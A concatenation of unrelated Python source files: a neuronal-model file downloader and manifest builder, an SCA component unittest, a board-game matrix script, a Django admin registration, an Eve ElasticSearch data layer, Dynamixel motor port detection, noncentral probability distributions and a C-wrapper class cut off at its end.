        }
        self.sweeps = []

        if 'msg' in json_parsed_data:
            for neuronal_model in json_parsed_data['msg']:
                # fit parameters attached directly to the model
                if 'well_known_files' in neuronal_model:
                    for well_known_file in neuronal_model['well_known_files']:
                        if ('id' in well_known_file and
                            'path' in well_known_file and
                            self.is_well_known_file_type(well_known_file,
                                                         BiophysicalPerisomaticApi._FIT_file_type)):
                            self.ids['fit'][str(well_known_file['id'])] = \
                                os.path.split(well_known_file['path'])[1]

                # mod files attached to the model template
                if 'neuronal_model_template' in neuronal_model:
                    neuronal_model_template = neuronal_model['neuronal_model_template']
                    if 'well_known_files' in neuronal_model_template:
                        for well_known_file in neuronal_model_template['well_known_files']:
                            if ('id' in well_known_file and
                                'path' in well_known_file and
                                self.is_well_known_file_type(well_known_file,
                                                             BiophysicalPerisomaticApi._MOD_file_type)):
                                self.ids['modfiles'][str(well_known_file['id'])] = \
                                    os.path.join('modfiles',
                                                 os.path.split(well_known_file['path'])[1])

                if 'specimen' in neuronal_model:
                    specimen = neuronal_model['specimen']

                    # SWC morphology from the specimen's reconstructions
                    if 'neuron_reconstructions' in specimen:
                        for neuron_reconstruction in specimen['neuron_reconstructions']:
                            if 'well_known_files' in neuron_reconstruction:
                                for well_known_file in neuron_reconstruction['well_known_files']:
                                    if ('id' in well_known_file and
                                        'path' in well_known_file and
                                        self.is_well_known_file_type(well_known_file,
                                                                     BiophysicalPerisomaticApi._SWC_file_type)):
                                        self.ids['morphology'][str(well_known_file['id'])] = \
                                            os.path.split(well_known_file['path'])[1]

                    # NWB stimulus file from the specimen's ephys result
                    if 'ephys_result' in specimen:
                        ephys_result = specimen['ephys_result']
                        if 'well_known_files' in ephys_result:
                            for well_known_file in ephys_result['well_known_files']:
                                if ('id' in well_known_file and
                                    'path' in well_known_file and
                                    self.is_well_known_file_type(well_known_file,
                                                                 BiophysicalPerisomaticApi._NWB_file_type)):
                                    self.ids['stimulus'][str(well_known_file['id'])] = \
                                        "%d.nwb" % (ephys_result['id'])

                    # keep every sweep except the test sweeps
                    self.sweeps = [sweep['sweep_number']
                                   for sweep in specimen['ephys_sweeps']
                                   if sweep['stimulus_name'] != 'Test']

        return self.ids

    def is_well_known_file_type(self, wkf, name):
        '''Check if a structure has the expected name.

        Parameters
        ----------
        wkf : dict
            A well-known-file structure with nested type information.
        name : string
            The expected type name

        See Also
        --------
        read_json: where this helper function is used.
        '''
        try:
            return wkf['well_known_file_type']['name'] == name
        except (KeyError, TypeError):
            # missing or malformed type info -- treat as a non-match
            return False

    def get_well_known_file_ids(self, neuronal_model_id):
        '''Query the current RMA endpoint with a neuronal_model id
        to get the corresponding well known file ids.

        Returns
        -------
        dict
            Well known file id strings, keyed by category.
        '''
        rma_builder_fn = self.build_rma
        json_traversal_fn = self.read_json

        return self.do_query(rma_builder_fn, json_traversal_fn, neuronal_model_id)

    def create_manifest(self,
                        fit_path='',
                        stimulus_filename='',
                        swc_morphology_path='',
                        sweeps=None):
        '''Generate a json configuration file with parameters for a
        a biophysical experiment.

        Parameters
        ----------
        fit_path : string
            filename of a json configuration file with cell parameters.
        stimulus_filename : string
            path to an NWB file with input currents.
        swc_morphology_path : string
            file in SWC format.
        sweeps : array of integers, optional
            which sweeps in the stimulus file are to be used.
        '''
        # None default avoids the shared-mutable-default-argument pitfall
        if sweeps is None:
            sweeps = []

        self.manifest = OrderedDict()
        self.manifest['biophys'] = [{
                'model_file': [ 'manifest.json',  fit_path ]
            }]
        self.manifest['runs'] = [{
                'sweeps': sweeps
            }]
        self.manifest['neuron'] = [{
                'hoc': [ 'stdgui.hoc', 'import3d.hoc' ]
            }]
        self.manifest['manifest'] = [
                {
                    'type': 'dir',
                    'spec': '.',
                    'key': 'BASEDIR'
                },
                {
                    'type': 'dir',
                    'spec': 'work',
                    'key': 'WORKDIR',
                    'parent': 'BASEDIR'
                },
                {
                    'type': 'file',
                    'spec': swc_morphology_path,
                    'key': 'MORPHOLOGY'
                },
                {
                    'type': 'dir',
                    'spec': 'modfiles',
                    'key': 'MODFILE_DIR'
                },
                {
                    'type': 'file',
                    'format': 'NWB',
                    'spec': stimulus_filename,
                    'key': 'stimulus_path'
                },
                {
                  'parent_key': 'WORKDIR',
                  'type': 'file',
                  'format': 'NWB',
                  'spec': stimulus_filename,
                  'key': 'output'
                }
            ]

    @staticmethod
    def _ensure_dir(path):
        '''Create directory `path` if it does not already exist.'''
        try:
            os.stat(path)
        except OSError:
            os.mkdir(path)

    def cache_data(self,
                   neuronal_model_id,
                   working_directory=None):
        '''Take an experiment id, query the Api RMA to get well-known-files,
        download the files, and store them in the working directory.

        Parameters
        ----------
        neuronal_model_id : int or string representation
            found in the neuronal_model table in the api
        working_directory : string
            Absolute path name where the downloaded well-known files will be stored.
        '''
        if working_directory is None:
            working_directory = self.default_working_directory

        self._ensure_dir(working_directory)
        self._ensure_dir(os.path.join(working_directory, 'work'))
        self._ensure_dir(os.path.join(working_directory, 'modfiles'))

        well_known_file_id_dict = self.get_well_known_file_ids(neuronal_model_id)

        for key, id_dict in well_known_file_id_dict.items():
            if (not self.cache_stimulus) and (key == 'stimulus'):
                continue

            for well_known_id, filename in id_dict.items():
                well_known_file_url = self.construct_well_known_file_download_url(well_known_id)
                cached_file_path = os.path.join(working_directory, filename)
                self.retrieve_file_over_http(well_known_file_url, cached_file_path)

        # list(...): dict views are not indexable on Python 3
        fit_path = list(self.ids['fit'].values())[0]
        stimulus_filename = list(self.ids['stimulus'].values())[0]
        swc_morphology_path = list(self.ids['morphology'].values())[0]
        sweeps = sorted(self.sweeps)

        self.create_manifest(fit_path,
                             stimulus_filename,
                             swc_morphology_path,
                             sweeps)

        manifest_path = os.path.join(working_directory, 'manifest.json')
        # text mode: json.dumps returns str, which a 'wb' handle rejects on Python 3
        with open(manifest_path, 'w') as f:
            f.write(json.dumps(self.manifest, indent=2))

#!/usr/bin/env python
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file 
# distributed with this source distribution.
# 
# This file is part of GNUHAWK.
# 
# GNUHAWK is free software: you can redistribute it and/or modify is under the 
# terms of the GNU General Public License as published by the Free Software 
# Foundation, either version 3 of the License, or (at your option) any later 
# version.
# 
# GNUHAWK is distributed in the hope that it will be useful, but WITHOUT ANY 
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 
# A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

# You should have received a copy of the GNU General Public License along with 
# this program.  If not, see http://www.gnu.org/licenses/.
#
 
import unittest
import ossie.utils.testing
import os
from omniORB import any

class ComponentTests(ossie.utils.testing.ScaComponentTestCase):
    """Test for all component implementations in sig_source_i"""

    def testScaBasicBehavior(self):
        """Launch the component and exercise the basic SCA lifecycle:
        launch, state checks, initialize/configure, query, ports, start/stop
        and release."""
        #######################################################################
        # Launch the component with the default execparams
        execparams = self.getPropertySet(kinds=("execparam",), modes=("readwrite", "writeonly"), includeNil=False)
        execparams = dict([(x.id, any.from_any(x.value)) for x in execparams])
        self.launch(execparams)
        
        #######################################################################
        # Verify the basic state of the component
        self.assertNotEqual(self.comp, None)
        self.assertEqual(self.comp.ref._non_existent(), False)
        self.assertEqual(self.comp.ref._is_a("IDL:CF/Resource:1.0"), True)
        self.assertEqual(self.spd.get_id(), self.comp.ref._get_identifier())
        
        #######################################################################
        # Simulate regular component startup
        # Verify that neither initialize nor configure throws errors
        self.comp.initialize()
        configureProps = self.getPropertySet(kinds=("configure",), modes=("readwrite", "writeonly"), includeNil=False)
        self.comp.configure(configureProps)
        
        #######################################################################
        # Validate that query returns all expected parameters
        # Query of '[]' should return the following set of properties
        expectedProps = []
        expectedProps.extend(self.getPropertySet(kinds=("configure", "execparam"), modes=("readwrite", "readonly"), includeNil=True))
        expectedProps.extend(self.getPropertySet(kinds=("allocate",), action="external", includeNil=True))
        props = self.comp.query([])
        props = dict((x.id, any.from_any(x.value)) for x in props)
        # Query may return more than expected, but not less
        for expectedProp in expectedProps:
            # BUG FIX: dict.has_key() was removed in Python 3; the `in`
            # operator works on both Python 2 and 3.
            self.assertEqual(expectedProp.id in props, True)
        
        #######################################################################
        # Verify that all expected ports are available
        for port in self.scd.get_componentfeatures().get_ports().get_uses():
            port_obj = self.comp.getPort(str(port.get_usesname()))
            self.assertNotEqual(port_obj, None)
            self.assertEqual(port_obj._non_existent(), False)
            self.assertEqual(port_obj._is_a("IDL:CF/Port:1.0"),  True)
            
        for port in self.scd.get_componentfeatures().get_ports().get_provides():
            port_obj = self.comp.getPort(str(port.get_providesname()))
            self.assertNotEqual(port_obj, None)
            self.assertEqual(port_obj._non_existent(), False)
            self.assertEqual(port_obj._is_a(port.get_repid()),  True)
            
        #######################################################################
        # Make sure start and stop can be called without throwing exceptions
        self.comp.start()
        self.comp.stop()
        
        #######################################################################
        # Simulate regular component shutdown
        self.comp.releaseObject()
        
    # TODO Add additional tests here
    #
    # See:
    #   ossie.utils.bulkio.bulkio_helpers,
    #   ossie.utils.bluefile.bluefile_helpers
    # for modules that will assist with testing components with BULKIO ports
    
# Entry point: run the ossie test harness against the component's SPD file.
if __name__ == "__main__":
    ossie.utils.testing.main("../sig_source_i.spd.xml") # By default tests all implementations

# -*- coding: utf-8 -*-
"""
Created on Wed Jul  6 22:58:00 2016

@author: Diogo
"""

# -*- coding: utf-8 -*-
"""
Created on Sun Jun 26 19:08:00 2016

@author: Diogo
"""
def ImportGames(path='C:\\Users\\Diogo\\Documents\\Monografia FIA\\UserGamesCleansed.txt'):
    """Read the '##'-separated user/game file at *path*.

    Returns a tuple ``(games, user_games)`` where ``games`` is the list of
    distinct cleaned game names (tabs and double spaces normalized) and
    ``user_games`` maps each user to a dict whose keys are the games that
    user has (value always 1).

    The *path* parameter defaults to the original hard-coded location, so
    existing calls keep working.
    """
    games = list()
    user_games = dict()

    with open(path, 'r', encoding='utf-8') as lines:

        next(lines)  # Skip the header line

        for ln in lines:
            user, board_game, board_type, list_type, score10 = ln.split('##')

            # Normalize the name once: tabs would break the tab-separated
            # matrix file written later, and the source data contains
            # double spaces.
            game = board_game.replace('\t', ' ').replace('  ', ' ')

            # BUG FIX: the original tested the *raw* name against the list
            # of *cleaned* names (and stored raw names as user_games keys),
            # so cleaned names could be appended more than once and never
            # matched the matrix columns in BuildMatrix. Use the cleaned
            # name consistently for both structures.
            if game not in games:
                games.append(game)

            if user not in user_games:
                user_games[user] = dict()

            if game not in user_games[user]:
                user_games[user][game] = 1

    return (games, user_games)
	
# Build the game list and the per-user ownership map from the cleansed file.
games, user_games = ImportGames()

def BuildMatrix(games, user_games, path='C:\\Users\\Diogo\\Documents\\Monografia FIA\\UserGamesMatrix.tab'):
    """Append a user x game 0/1 ownership matrix to *path*, tab-separated.

    The first row holds 'user' followed by the game names; every following
    row holds a user name followed by one '1'/'0' flag per game.

    The *path* parameter defaults to the original hard-coded location, so
    existing calls keep working.
    """
    # Open the output once; the original re-opened the file in append mode
    # for every single user, which is wasteful. Append mode is kept so the
    # observable file contents are unchanged.
    with open(path, 'a', encoding='utf-8') as out:
        out.write('user\t' + '\t'.join(games) + '\n')

        for user in user_games:
            flags = ['1' if game in user_games[user] else '0' for game in games]
            out.write(user + '\t' + '\t'.join(flags) + '\n')
		
# Write the user x game matrix using the data loaded above.
BuildMatrix(games, user_games)
# -*- coding: utf-8 -*-

from django.contrib import admin

from models import FileMapping

# Register your models here.

# Expose FileMapping in the Django admin with the default ModelAdmin options.
admin.site.register(FileMapping)



import ast
import json
import arrow
import elasticsearch

from bson import ObjectId
from flask import request
from eve.utils import config
from eve.io.base import DataLayer

try:
    from urllib.parse import urlparse
except ImportError:
    from urlparse import urlparse


def parse_date(date_str):
    """Parse an elastic datetime string into a ``datetime`` instance."""
    try:
        parsed = arrow.get(date_str)
    except TypeError:
        # Some payloads wrap the value in a list; retry with the first item.
        parsed = arrow.get(date_str[0])
    return parsed.datetime


def get_dates(schema):
    """Return the list of datetime fields for the given schema, always
    including the metadata timestamp fields."""
    schema_dates = [field for field, field_schema in schema.items()
                    if field_schema['type'] == 'datetime']
    return [config.LAST_UPDATED, config.DATE_CREATED] + schema_dates


def format_doc(hit, schema, dates):
    """Format an elastic hit into a document matching the resource schema."""
    doc = hit.get('_source', {})
    doc.setdefault(config.ID_FIELD, hit.get('_id'))
    doc.setdefault('_type', hit.get('_type'))

    # Convert serialized datetime strings back into datetime objects.
    for date_field in (key for key in dates if key in doc):
        doc[date_field] = parse_date(doc[date_field])

    return doc


def noop():
    """Do nothing and return None; used as the default
    'elastic_filter_callback' so its result is filtered out downstream."""
    pass


def is_elastic(datasource):
    """Detect if the given resource datasource uses elastic as its
    primary or search backend."""
    backends = (datasource.get('backend'), datasource.get('search_backend'))
    return 'elastic' in backends


class ElasticJSONSerializer(elasticsearch.JSONSerializer):
    """JSON serializer for elastic that understands mongo ObjectId."""

    def default(self, value):
        """Stringify ObjectId values; defer everything else to the base."""
        if not isinstance(value, ObjectId):
            return super(ElasticJSONSerializer, self).default(value)
        return str(value)


class ElasticCursor(object):
    """Cursor-like wrapper around an elastic search response."""

    # Response shape used when no hits were supplied.
    no_hits = {'hits': {'total': 0, 'hits': []}}

    def __init__(self, hits=None, docs=None):
        """Store the raw response and the already-parsed documents."""
        self.hits = hits or self.no_hits
        self.docs = docs or []

    def __getitem__(self, key):
        return self.docs[key]

    def first(self):
        """Return the first document, or None when there is none."""
        if not self.docs:
            return None
        return self.docs[0]

    def count(self, **kwargs):
        """Return the total number of hits reported by elastic."""
        return int(self.hits['hits']['total'])

    def extra(self, response):
        """Copy facets/aggregations from the raw response when present."""
        for source_key, target_key in (('facets', '_facets'),
                                       ('aggregations', '_aggregations')):
            if source_key in self.hits:
                response[target_key] = self.hits[source_key]


def set_filters(query, base_filters):
    """Combine all filters into a single 'and' filter on the filtered query.

    :param query: elastic query being constructed
    :param base_filters: filters set outside of the query (resource config,
        sub_resource_lookup); None entries are skipped
    """
    combined = [flt for flt in base_filters if flt is not None]

    existing = query['query']['filtered'].get('filter')
    if existing is not None:
        # Flatten an existing 'and' filter rather than nesting it.
        combined.extend(existing['and'] if 'and' in existing else [existing])

    if combined:
        query['query']['filtered']['filter'] = {'and': combined}


def set_sort(query, sort):
    """Translate (field, direction) pairs into the elastic 'sort' list;
    a positive direction sorts ascending, anything else descending."""
    query['sort'] = [{field: 'asc' if direction > 0 else 'desc'}
                     for field, direction in sort]


def get_es(url):
    """Create an Elasticsearch client for *url* with an ObjectId-aware
    JSON serializer installed on its transport."""
    parsed = urlparse(url)
    client = elasticsearch.Elasticsearch(
        hosts=[{'host': parsed.hostname, 'port': parsed.port}])
    client.transport.serializer = ElasticJSONSerializer()
    return client


def get_indices(es):
    """Return an IndicesClient bound to the given elasticsearch client."""
    return elasticsearch.client.IndicesClient(es)


class Elastic(DataLayer):
    """ElasticSearch data layer for Eve."""

    # Serializers Eve uses to coerce incoming values before storage.
    serializers = {
        'integer': int,
        'datetime': parse_date,
        'objectid': ObjectId,
    }

    def init_app(self, app):
        """Read the app config, connect to elastic, and prepare the index
        and the per-resource mappings."""
        app.config.setdefault('ELASTICSEARCH_URL', 'http://localhost:9200/')
        app.config.setdefault('ELASTICSEARCH_INDEX', 'eve')

        self.index = app.config['ELASTICSEARCH_INDEX']
        self.es = get_es(app.config['ELASTICSEARCH_URL'])

        self.create_index(self.index)
        self.put_mapping(app)

    def _get_field_mapping(self, schema):
        """Get the elastic mapping for a given field schema, or None when
        the default mapping is fine."""
        if 'mapping' in schema:
            return schema['mapping']
        elif schema['type'] == 'datetime':
            return {'type': 'date'}
        elif schema['type'] == 'string' and schema.get('unique'):
            return {'type': 'string', 'index': 'not_analyzed'}

    def create_index(self, index=None):
        """Create the given index (default: the configured one), ignoring
        the error raised when it already exists."""
        if index is None:
            index = self.index
        try:
            # BUG FIX: previously always created ``self.index``, silently
            # ignoring the ``index`` argument.
            get_indices(self.es).create(index)
        except elasticsearch.TransportError:
            pass

    def put_mapping(self, app):
        """Put mapping for elasticsearch for current schema.

        It's not called automatically now, but rather left for user to call it whenever it makes sense.
        """

        indices = get_indices(self.es)

        for resource, resource_config in app.config['DOMAIN'].items():
            datasource = resource_config.get('datasource', {})

            if not is_elastic(datasource):
                continue

            if datasource.get('source', resource) != resource:  # only put mapping for core types
                continue

            properties = {}
            properties[config.DATE_CREATED] = self._get_field_mapping({'type': 'datetime'})
            properties[config.LAST_UPDATED] = self._get_field_mapping({'type': 'datetime'})

            for field, schema in resource_config['schema'].items():
                field_mapping = self._get_field_mapping(schema)
                if field_mapping:
                    properties[field] = field_mapping

            mapping = {'properties': properties}
            indices.put_mapping(index=self.index, doc_type=resource, body=mapping, ignore_conflicts=True)

    def find(self, resource, req, sub_resource_lookup):
        """Run a search for *resource*, honouring the request's
        source/q/sort/paging args plus any configured resource filters,
        facets and aggregations."""
        args = getattr(req, 'args', request.args if request else {})
        source_config = config.SOURCES[resource]

        # Wrap any caller-supplied query into a 'filtered' query so the
        # resource filters below can always be attached.
        if args.get('source'):
            query = json.loads(args.get('source'))
            if 'filtered' not in query.get('query', {}):
                _query = query.get('query')
                query['query'] = {'filtered': {}}
                if _query:
                    query['query']['filtered']['query'] = _query
        else:
            query = {'query': {'filtered': {}}}

        if args.get('q', None):
            query['query']['filtered']['query'] = _build_query_string(args.get('q'),
                                                                      default_field=args.get('df', '_all'))

        if 'sort' not in query:
            if req.sort:
                sort = ast.literal_eval(req.sort)
                set_sort(query, sort)
            elif self._default_sort(resource) and 'query' not in query['query']['filtered']:
                set_sort(query, self._default_sort(resource))

        if req.max_results:
            query.setdefault('size', req.max_results)

        if req.page > 1:
            query.setdefault('from', (req.page - 1) * req.max_results)

        filters = []
        filters.append(source_config.get('elastic_filter'))
        filters.append(source_config.get('elastic_filter_callback', noop)())
        filters.append({'term': sub_resource_lookup} if sub_resource_lookup else None)
        filters.append(json.loads(args.get('filter')) if 'filter' in args else None)
        set_filters(query, filters)

        if 'facets' in source_config:
            query['facets'] = source_config['facets']

        if 'aggregations' in source_config:
            query['aggs'] = source_config['aggregations']

        args = self._es_args(resource)
        hits = self.es.search(body=query, **args)
        return self._parse_hits(hits, resource)

    def find_one(self, resource, req, **lookup):
        """Fetch a single document, by id when the lookup contains the id
        field, otherwise via a 'term' query."""

        def is_found(hit):
            # Older elastic versions report 'exists' instead of 'found'.
            if 'exists' in hit:
                hit['found'] = hit['exists']
            return hit.get('found', False)

        args = self._es_args(resource)

        if config.ID_FIELD in lookup:
            try:
                hit = self.es.get(id=lookup[config.ID_FIELD], **args)
            except elasticsearch.NotFoundError:
                return

            if not is_found(hit):
                return

            docs = self._parse_hits({'hits': {'hits': [hit]}}, resource)
            return docs.first()
        else:
            query = {
                'query': {
                    'term': lookup
                }
            }

            try:
                args['size'] = 1
                hits = self.es.search(body=query, **args)
                docs = self._parse_hits(hits, resource)
                return docs.first()
            except elasticsearch.NotFoundError:
                return

    def find_one_raw(self, resource, _id):
        """Fetch a single document by id without any lookup logic."""
        args = self._es_args(resource)
        hit = self.es.get(id=_id, **args)
        return self._parse_hits({'hits': {'hits': [hit]}}, resource).first()

    def find_list_of_ids(self, resource, ids, client_projection=None):
        """Fetch the documents with the given ids via multi-get."""
        args = self._es_args(resource)
        return self._parse_hits(self.es.multi_get(ids, **args), resource)

    def insert(self, resource, doc_or_docs, **kwargs):
        """Index the given document(s) and return their ids; refreshes the
        index so the documents are immediately searchable."""
        ids = []
        kwargs.update(self._es_args(resource))
        for doc in doc_or_docs:
            doc.update(self.es.index(body=doc, id=doc.get('_id'), **kwargs))
            ids.append(doc['_id'])
        get_indices(self.es).refresh(self.index)
        return ids

    def update(self, resource, id_, updates):
        """Apply a partial update to the document with the given id."""
        args = self._es_args(resource, refresh=True)
        return self.es.update(id=id_, body={'doc': updates}, **args)

    def replace(self, resource, id_, document):
        """Replace the document with the given id wholesale."""
        args = self._es_args(resource, refresh=True)
        return self.es.index(body=document, id=id_, **args)

    def remove(self, resource, lookup=None):
        """Delete a single document (when a lookup with '_id' is given) or
        every document of the resource."""
        args = self._es_args(resource)
        if lookup:
            try:
                return self.es.delete(id=lookup.get('_id'), refresh=True, **args)
            except elasticsearch.NotFoundError:
                return
        else:
            query = {'query': {'match_all': {}}}
            return self.es.delete_by_query(body=query, **args)

    def is_empty(self, resource):
        """Test if the resource holds no documents."""
        args = self._es_args(resource)
        res = self.es.count(body={'query': {'match_all': {}}}, **args)
        return res.get('count', 0) == 0

    def get_mapping(self, index, doc_type=None):
        """Return the elastic mapping for the given index/doc type."""
        return get_indices(self.es).get_mapping(index=index, doc_type=doc_type)

    def _parse_hits(self, hits, resource):
        """Parse a hits response into an ElasticCursor of documents."""
        datasource = self._datasource(resource)
        schema = config.DOMAIN[datasource[0]]['schema']
        dates = get_dates(schema)
        docs = []
        for hit in hits.get('hits', {}).get('hits', []):
            docs.append(format_doc(hit, schema, dates))
        return ElasticCursor(hits, docs)

    def _es_args(self, resource, refresh=None):
        """Get the index and doc_type kwargs for elastic calls."""
        datasource = self._datasource(resource)
        args = {
            'index': self.index,
            'doc_type': datasource[0],
            }
        if refresh:
            args['refresh'] = refresh
        return args

    def _fields(self, resource):
        """Get the comma-separated projection fields for given resource,
        always including the metadata timestamp fields."""
        datasource = self._datasource(resource)
        keys = list(datasource[2].keys())
        # BUG FIX: the original concatenated two separately joined strings
        # with no comma in between, fusing the last projection key with
        # config.LAST_UPDATED; join everything in one pass instead.
        return ','.join(keys + [config.LAST_UPDATED, config.DATE_CREATED])

    def _default_sort(self, resource):
        """Return the datasource's configured default sort, if any."""
        datasource = self._datasource(resource)
        return datasource[3]


def build_elastic_query(doc):
    """Build an ElasticSearch 'filtered' query from a simple doc.

    The 'q' key becomes a ``query_string`` query, e.g. ``{"q": "cricket"}``
    produces::

        {"query": {"filtered": {"query": {"query_string": {
            "query": "cricket", "lenient": false,
            "default_operator": "AND"}}}}}

    Every other key becomes a filter — a ``terms`` filter when the value is
    a list, a ``term`` filter otherwise — all combined with ``and``, so
    ``{"q": "cricket", "type": ["text"], "source": "AAP"}`` adds::

        {"and": [{"terms": {"type": ["text"]}}, {"term": {"source": "AAP"}}]}

    :param doc: A document object which is inline with the syntax specified
                in the examples. It's the developer responsibility to pass
                right object.
    :returns ElasticSearch query
    """
    elastic_query = {"query": {"filtered": {}}}
    filters = []

    for field, value in doc.items():
        if field == 'q':
            elastic_query['query']['filtered']['query'] = _build_query_string(doc['q'])
        elif isinstance(value, list):
            filters.append({"terms": {field: value}})
        else:
            filters.append({"term": {field: value}})

    set_filters(elastic_query, filters)
    return elastic_query


def _build_query_string(q, default_field=None):
    """
    Builds "query_string" object from 'q'.

    :param: q of type String
    :param: default_field
    :return: dictionary object.
    """

    query_string = {'query_string': {'query': q, 'default_operator': 'AND'}}
    query_string['query_string'].update({'lenient': False} if default_field else {'default_field': default_field})

    return query_string

import platform
import glob

from .io import DxlIO, Dxl320IO, DxlError
from .error import BaseErrorHandler
from .controller import BaseDxlController
from .motor import DxlMXMotor, DxlAXRXMotor, DxlXL320Motor

from ..robot import Robot


def _get_available_ports():
    """ Tries to find the available usb2serial ports on your system. """
    system = platform.system()

    if system == 'Darwin':
        return glob.glob('/dev/tty.usb*')

    if system == 'Linux':
        return glob.glob('/dev/ttyACM*') + glob.glob('/dev/ttyUSB*')

    if system == 'Windows':
        import _winreg
        import itertools

        found = []
        key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,
                              'HARDWARE\\DEVICEMAP\\SERIALCOMM')

        # Enumerate registry values until EnumValue runs out of entries.
        for index in itertools.count():
            try:
                found.append(str(_winreg.EnumValue(key, index)[1]))
            except WindowsError:
                return found

    return []


def get_available_ports(only_free=False):
    """ List the available usb2serial ports, optionally excluding the ones
        already opened by a DxlIO instance. """
    available = _get_available_ports()

    if not only_free:
        return available

    return list(set(available) - set(DxlIO.get_used_ports()))


def find_port(ids, strict=True):
    """ Find the port with the specified attached motor ids.

        :param list ids: list of motor ids to find
        :param bool strict: specify if all ids should be found (when set to False, finding at least half of the motors is enough)

        .. warning:: If two (or more) ports are attached to the same list of motor ids the first match will be returned.

    """
    for port in get_available_ports():
        # Try both protocols on each port; skip ports that raise DxlError.
        for io_class in (DxlIO, Dxl320IO):
            try:
                with io_class(port) as dxl:
                    found = len(dxl.scan(ids))

                    if strict and found == len(ids):
                        return port

                    if not strict and found >= len(ids) / 2:
                        return port
            except DxlError:
                continue

    raise IndexError('No suitable port found for ids {}!'.format(ids))


def autodetect_robot():
    """ Creates a :class:`~pypot.robot.robot.Robot` by detecting dynamixel motors on all available ports. """
    controllers = []

    # Map the model-name prefix to the corresponding motor class.
    motor_classes = {
        'MX': DxlMXMotor,
        'RX': DxlAXRXMotor,
        'AX': DxlAXRXMotor,
        'XL': DxlXL320Motor,
    }

    for port in get_available_ports():
        for io_class in (DxlIO, Dxl320IO):
            dxl_io = io_class(port)
            found_ids = dxl_io.scan()

            if not found_ids:
                # Nothing answered with this protocol: release the port.
                dxl_io.close()
                continue

            models = dxl_io.get_model(found_ids)
            motors = [motor_classes[model[:2]](motor_id, model=model)
                      for motor_id, model in zip(found_ids, models)]

            controllers.append(BaseDxlController(dxl_io, motors))

    return Robot(controllers)

from numpy import sqrt

from pacal.standard_distr import NormalDistr, ChiSquareDistr
from pacal.distr import Distr, SumDistr, DivDistr, InvDistr
from pacal.distr import sqrt as distr_sqrt

class NoncentralTDistr(DivDistr):
    """Noncentral Student's t distribution, built as the quotient
    N(mu, 1) / sqrt(ChiSquare(df) / df)."""
    def __init__(self, df = 2, mu = 0):
        numerator = NormalDistr(mu, 1)
        denominator = distr_sqrt(ChiSquareDistr(df) / df)
        super(NoncentralTDistr, self).__init__(numerator, denominator)
        self.df = df
        self.mu = mu
    def __str__(self):
        return "NoncentralTDistr(df={0},mu={1})#{2}".format(self.df, self.mu, self.id())
    def getName(self):
        return "NoncT({0},{1})".format(self.df, self.mu)

class NoncentralChiSquareDistr(SumDistr):
    """Noncentral chi-square distribution, built as the sum
    N(sqrt(lambda), 1)**2 + ChiSquare(df - 1).

    Construction happens in ``__new__`` because for df == 1 the
    distribution reduces to the squared normal alone, which is a different
    object type than this class.
    """
    def __new__(cls, df, lmbda = 0):
        assert df >= 1
        d1 = NormalDistr(sqrt(lmbda))**2
        if df == 1:
            # Degenerate case: no chi-square summand is left, so return the
            # squared normal itself rather than a SumDistr instance.
            return d1
        d2 = ChiSquareDistr(df - 1)
        ncc2 = super(NoncentralChiSquareDistr, cls).__new__(cls, d1, d2)
        # SumDistr's __init__ is invoked explicitly here; __init__ below is
        # deliberately a no-op so the summands are not re-initialized when
        # Python calls it after __new__.
        super(NoncentralChiSquareDistr, ncc2).__init__(d1, d2)
        ncc2.df = df
        ncc2.lmbda = lmbda
        return ncc2
    def __init__(self, df, lmbda = 0):
        # Intentionally empty: all initialization is done in __new__.
        pass
    def __str__(self):
        return "NoncentralChiSquare(df={0},lambda={1})#{2}".format(self.df, self.lmbda, self.id())
    def getName(self):
        return "NoncChi2({0},{1})".format(self.df, self.lmbda)

class NoncentralBetaDistr(InvDistr):
    """Noncentral beta distribution, built as the InvDistr of
    1 + ChiSquare(2*beta) / NoncentralChiSquare(2*alpha, lambda)."""
    def __init__(self, alpha = 1, beta = 1, lmbda = 0):
        ratio = ChiSquareDistr(2.0 * beta) / NoncentralChiSquareDistr(2 * alpha, lmbda)
        super(NoncentralBetaDistr, self).__init__(1 + ratio)
        self.alpha = alpha
        self.beta = beta
        self.lmbda = lmbda
    def __str__(self):
        return "NoncentralBetaDistr(alpha={0},beta={1},lambda={2})#{3}".format(self.alpha, self.beta, self.lmbda, self.id())
    def getName(self):
        return "NoncBeta({0},{1},{2})".format(self.alpha, self.beta, self.lmbda)
    
class NoncentralFDistr(DivDistr):
    """Noncentral F distribution, built as the quotient
    (NoncentralChiSquare(df1, lambda) / df1) / (ChiSquare(df2) / df2)."""
    def __init__(self, df1 = 1, df2 = 1, lmbda = 0):
        numerator = NoncentralChiSquareDistr(df1, lmbda) / df1
        denominator = ChiSquareDistr(df2) / df2
        super(NoncentralFDistr, self).__init__(numerator, denominator)
        self.df1 = df1
        self.df2 = df2
        self.lmbda = lmbda
    def __str__(self):
        return "NoncentralFDistr(df1={0},df2={1},lambda={2})#{3}".format(self.df1, self.df2, self.lmbda, self.id())
    def getName(self):
        return "NoncF({0},{1},{2})".format(self.df1, self.df2, self.lmbda)

from ert.cwrap import CWrapper, BaseCClass
from ert.enkf import ENKF_LIB
from ert.util import StringList


class SummaryKeyMatcher(BaseCClass):
    """Python wrapper around the native ``summary_key_matcher`` structure.

    Holds a set of summary keys; all operations are delegated to the C
    functions bound via the prototypes registered at the bottom of this
    module.
    """

    def __init__(self):
        # Allocate the native structure and hand the pointer to BaseCClass,
        # which manages its lifetime.
        c_ptr = SummaryKeyMatcher.cNamespace().alloc()

        super(SummaryKeyMatcher, self).__init__(c_ptr)

    def addSummaryKey(self, key):
        """Add a summary key (must be a str) to the matcher."""
        assert isinstance(key, str)
        return SummaryKeyMatcher.cNamespace().add_key(self, key)

    def __len__(self):
        # Number of keys currently held by the matcher.
        return SummaryKeyMatcher.cNamespace().size(self)

    def __contains__(self, key):
        # True when the native matcher matches the given key.
        return SummaryKeyMatcher.cNamespace().match_key(self, key)

    def isRequired(self, key):
        """ @rtype: bool """
        return SummaryKeyMatcher.cNamespace().is_required(self, key)

    def keys(self):
        """ @rtype: StringList """
        return SummaryKeyMatcher.cNamespace().keys(self)

    def free(self):
        # Release the native structure; invoked by the BaseCClass machinery.
        SummaryKeyMatcher.cNamespace().free(self)


# Register the wrapper type with the C wrapper layer and bind the native
# summary_key_matcher function prototypes used by the class above.
cwrapper = CWrapper(ENKF_LIB)
